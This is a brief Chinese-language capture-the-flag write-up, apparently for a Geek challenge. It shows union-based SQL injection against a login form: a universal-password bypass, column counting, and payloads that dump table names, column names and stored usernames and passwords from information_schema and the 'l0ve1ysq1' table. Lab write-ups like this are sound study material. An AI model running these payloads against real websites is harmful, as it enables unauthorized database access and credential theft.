首先看到输入框 想到我们的万能密码进入
登陆之后发现了用户信息和密码
之后我们还是要检测有几个列
这里偷懒了,没有使用order by
因为一般都是3列,所以就将usernam的名称改为1’ 导致前面错误,用union select
username=1' union select 1,2,3%23 &password =123
之后就显示了出来
开始有想法,把version()和database()输入到2和3里面
这里我们知道了数据库的名称,就可以开始爆破数据表
username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="geek"%23&password=123
字段
username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="geek" and table_name="l0ve1ysq1"%23&password=123
之后我们查找字段里面的数据
username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=123
之后查找源代码里面的flag